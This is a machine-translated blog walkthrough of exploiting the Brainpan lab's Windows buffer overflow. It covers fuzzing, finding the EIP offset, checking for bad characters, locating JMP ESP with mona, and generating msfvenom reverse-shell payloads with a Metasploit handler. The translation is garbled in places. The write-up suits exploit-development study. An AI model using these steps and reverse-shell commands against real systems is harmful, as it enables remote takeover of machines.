Brainpan - Windows buffer overflow details

Introduction to the

Penetration test Note:

This paper is only for technical discussion and research. The terminals or servers reproduced in all the notes are self-built environments for infiltration. I will use Kali Linux as the attacker machine for this study. The technology used here is for educational purposes only. This site and the authors are not responsible for the use of the technology listed for any other purpose.

One, foreword

Buffer overflow refers to the writing of content (usually more than the maximum amount of data that the buffer can hold) into the program input buffer in response to a programming flaw, thus breaking the program operation, taking advantage of the interruption and gaining control of the program and even the system.

Item 17: Brainpan-1 is specialized in testing buffer overflow knowledge. This project only opens 10000 ports as web end, and after simple directory blasting, it can find the existence of brainpan-exe file. This project is an Ubuntu environment and installed win module running exe file. This file starts the 9999 port support service. This environment is just like the PWN topic in AWD. There will be various methods to explain how to understand buffer overflow, how to detect buffer overflow, how to exploit buffer overflow, what is the stack and so on.

Next, I would like to share one of them, and welcome your advice.

Test for buffer overflow:

Python brainfuzzer. Py 192.168.4.96 9999Copy the code

1, Network security learning route 2, electronic books (white hat) 3, security factory internal video 4, 100 SRC documents 5, common security comprehensive questions 6, CTF contest classic topic analysis 7, full kit 8, emergency response notes

Through the program to send 1~1500 characters to verify, prompt program crash, there is a buffer overflow!

Windows buffer overflow

1. Open Immunity Debugger in Windows 10

Immunity Debugger is a bug analysis software that you can download from all over Baidu!

Immunity Debugger

https://blog.csdn.net/clark3256453/article/details/121422527

Copy the code

To start taking advantage of the action: then click: File -c :/…. The program

The interface after running the data:

This interface is the most initial program opening interface, you need to click the right arrow icon to run the program:

After opening the program, EAX value will be cleared to zero, this time the local program will run normally, and open port 9999!

2. Query the offset

1) Generate 1000 random values using pattern_create.rb

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

Copy the code

2) Modify script brainpan1

3) Send 1000 bits randomly to overwrite the program

Python brainpan1. Py 10.211.55.44 9999Copy the code

Perform onslaught on windows9999 service in kali 44.

It can be seen that ESP is overwritten, and the EIP value is 35724134

4) EIP View the offset

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134
[*] Exact match at offset 524

Copy the code

Offset 524!

5) How do you get it

First of all, we should know that the memory address is the opposite of the usual written address, memory will put the low memory address in the high memory address in the low, so the order is:

35724134
34 41 72 35

Copy the code

Comparison ASCII table:

34 41 72 35
4  A  r  5
4Ar5

Copy the code

The comparison ASCII table information is: 4Ar#

So contrast that with the overflow of 524 bits of the 1000 characters generated by pattern_create.rb, pattern_offset.rb will automatically calculate where 4Ar5 is in the 1000 characters!

3. Check the size of shellCode space

Write the shellCode into the address space. The program reads the EIP register value, jumps to the shellCode segment and executes it. Next, it finds out how much memory space can store the ShellCode.

[img-BN73rk2F-1647250101863] [upload_images.jianshu. IO /upload_imag…]

472 bytes of C will be put into the test!

Python brainpan2. Py 10.211.55.44 9999Copy the code

The bottom pointer to the EBP stack has been covered by 524 As, the EIP has indicated four Bs, and the ESP has covered 472 C bytes.

Right-click ESP and select Follow in Dump

Right-click in the lower left view and select: hex-hex /ASCII(16 bytes)

Select a 16-byte line display to watch!

Available start bit: 005FF910, end bit: 005FFAE0

1D0 is a hexadecimal, converted to decimal:

The minimum shellcode needs 300 bytes, and now the register size is 464, which is enough to store a Shellcode!

4. Look for bad characters

Different types of programs, protocols, and vulnerabilities recognize certain characters as bad characters that have a fixed purpose:

1\. Return address, ShellCode, and buffer must contain no bad characters. 2\. Null byte (0x00) null characters, which are used to terminate the string copy operationCopy the code

For example: computers use ASCII encoding and different codes represent different characters, one byte for each character 00000000– 11111111=256 There are 256 possible character situations

Next look for bad characters and rerun the program: brainpan2

Python brainpan3. Py 10.211.55.44 9999Copy the code

Or to view: right-click and select Follow in Dump

You can see that after selecting 16 bytes display, the most right side is 1 9 F means no bad characters!

Comparison found that except 00, the rest are very normal! Next, find the value of the instruction pointer register that jumps to ESP!

5. Exploit and develop vulnerabilities

Redirect data stream:

1\. Replace the EIP value with the ESP address 2\. However, the ESP address changes and hard coding is not feasible 3\Copy the code

Workarounds:

1\. Look for the fixed address of the system module in the memory 2\. Look for the address jump of JMP ESP instruction in the module, and then jump to ESP indirectly by this instruction, and then execute shellCode 3\.mona.py to identify the memory module. Search for "return address" is the module of JMP ESP instruction 4\. Find memory address 5\. Memory address does not contain bad characters without DEP, ALSR protectionCopy the code

! mona modulesCopy the code

SafeSEH, ASLR, NXCompat are all modules protected by memory protection mechanism! JMP ESP: JMP ESP: JMP ESP: JMP ESP: JMP ESP: JMP ESP

Now enter the module to find the command for JMP ESP! brainpan.exe 0BADF00D

Find JMP ESP: use nasm_shell.rb to find JMP ESP’s address!

locate nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000  FFE4              jmp esp

Copy the code

You can see JMP ESP address: \ XFF \xe4

First we need to find the EIP offset, which is the offset that exactly covers the EIP so that we can accurately cover the EIP register. So we need to know which four as are put into the EIP register, which is very complicated. Of course, there is a way to do this. Here we use Immunity Debugger plugin Mona, which avoids the usual complicated search method.

Mona: installation

Put mona. Py in PyCommands, the install directory of Immunity Debugger!

! mona find -s "\xff\xe4" -m brainpan.exeCopy the code

Get the JMP ESP address 0x311712F3

Shellcode generated:

Msfvenom -p Windows/shell_reverse_TCP LPORT=443 LHOST=192.168.2.157 -e x86/ shikatA_ga_nai -b "\x00" -f pyCopy the code

Generate shellcode after scripting!

Brainpan4:

Will shellcode prevent on – end!

Windows10 Open brainpan.exe:

Kali runs the script:

Shell: [image.pg-6a1393-1647249930375-0] [image.pg-6a1393-1647249930375-0]

To do this, bounce back the Linux shellcode: brainpan5

Msfvenom -p Linux /x86/ shell_reverse_TCP LPORT=443 LHOST=192.168.2.157 -e x86/ shikatA_ga_nai -b "\x00" -f pyCopy the code

Then replace the script shellCode:

After replacement, execute:

Msfconsole use exploit/multi/handler set payload Linux /x86/ shell_reverse_TCP set lport 443 set Lhost 192.168.2.157 exploit -jCopy the code

MSF successfully acquired rebound Shell!

Third, summary

Today I learned how to use The Immunity Debugger reverse analysis tool for Windows 10 buffer overflow, how to find stack space, how to check bad characters, how to write EXP utilization, and finally how to control the server by remote code. I learned a lot of tips and tricks. Hope small partners can actually operate again! To consolidate to inform the enterprise unit of the vulnerability, and as soon as possible to consolidate security!

We hope that we can enhance security awareness, no network security, no national security!

So much for today’s solid foundation, although basic, but must be kept in mind.

mo4tech.com (Moment For Technology) is a global community with thousands techies from across the global hang out!Passionate technologists, be it gadget freaks, tech enthusiasts, coders, technopreneurs, or CIOs, you would find them all here.

Brainpan – Windows buffer overflow details

Introduction to the

One, foreword

Windows buffer overflow

1. Open Immunity Debugger in Windows 10

2. Query the offset

3. Check the size of shellCode space

4. Look for bad characters

5. Exploit and develop vulnerabilities

Third, summary

Brainpan – Windows buffer overflow details

Introduction to the

One, foreword

Windows buffer overflow

1. Open Immunity Debugger in Windows 10

2. Query the offset

3. Check the size of shellCode space

4. Look for bad characters

5. Exploit and develop vulnerabilities

Third, summary

Related Posts

Reading Notes – In-depth understanding of the Java Virtual Machine

Gnawing concurrency (II) : The life cycle of Java threads

How does Mybatis integrate with Spring